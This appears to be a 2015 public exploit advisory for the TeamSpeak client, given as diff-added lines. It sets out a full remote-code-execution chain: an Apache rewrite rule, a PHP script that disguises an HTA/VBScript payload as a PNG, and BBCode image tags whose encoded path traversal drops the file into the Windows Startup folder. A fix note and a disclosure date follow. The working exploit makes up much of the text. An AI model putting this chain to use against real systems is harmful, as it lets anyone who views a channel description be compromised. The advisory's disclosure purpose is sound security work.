+If you set this bbcode on a channel description every user that sees it will download a file named "OwnedByNonnOreste.hta" on their Desktop with 0byte, you can also put images or other file extension!
+
+The built-in image fetcher in the Teamspeak client checks the content type and the file header to check if the response is a real image, but you can easily bypass this control and put your exploit payload.
+
+==========================================
+Bypass / Vector / Payload
+==========================================
+To bypass the control and put arbitrary data in your malicious file you only need a web server and you can easily set the Rewrite rule for the Exploitation.
+
+	Example:
+	
+	RewriteEngine On
+	RewriteCond %{REQUEST_URI} !/faker.php
+	RewriteRule .* /faker.php
+
+Then you need to write a simple php script to fake the payload as a png by sending the right content type and file header.
+
+	Example:
+	
+	<?php
+	header ('Content-type: image/png');
+	echo "\211PNG\r\n\032\n";
+	?>
+	<html>
+	<head>
+	<title>PWN3D</title>
+	<HTA:APPLICATION
+	  APPLICATIONNAME="OwnedByScurippio"
+	  ID="SnappySnappySna"
+	  VERSION="1.0"/>
+
+	<script language="VBScript">
+		
+	   Sub RunProgram
+			Set objShell = CreateObject("Wscript.Shell")
+			objShell.Run "calc.exe"
+		End Sub
+		RunProgram
+	</script>
+	</head>
+	</html>
+
+If you save the file in the windows startup directory you can achieve a remote code execution.
+
+	Example:
+
+	[img]http://example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cRoaming%5cMicrosoft%5cWindows%5cStart%20Menu%5cPrograms%5cStartup%5cWelcomeAndOwnedByNonnOreste.hta[/img]
+	[img]http://example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cRoaming%5cMicrosoft%5cWindows%5cStart%20Menu%5cPrograms%5cStartup%5cWelcomeAndOwnedByNonnOreste.hta[/img]
+
+The HTA file is a prefect vector for this exploit, you can execute trusted vb script (shell command or anything else) and the png header doesn't compromise the markup language syntax.
+At the next OS boot the victim will execute the malicious HTA file.
+
+=======
+Fix 
+=======
+
+Update to beta channel or wait the 3.0.18.2 hotfix for this exploit!
+
+======
+Info 
+======
+
+10/20/2015 - I have reported this Vulnerability to Teamspeak developers team  
+
+********* - Release the public exploit
+
+- Fuck the 'Captatori' - Tracciabili
+
+(Snappy is always with you :P )
+
+
+Copyright (c) 2015 Scurippio
+
+Permission is granted for the redistribution of this alert
+electronically. It may not be edited in any way without mine express
+written consent. If you wish to reprint the whole or any
+part of this alert in any other medium other than electronically,
+please email me for permission.
+
+Disclaimer: The information in the advisory is believed to be accurate
+at the time of publishing based on currently available information. Use
+of the information constitutes acceptance for use in an AS IS condition.
+There are no warranties with regard to this information. Neither the
+author nor the publisher accepts any liability for any direct, indirect,
+or consequential loss or damage arising from use of, or reliance on,
+this information.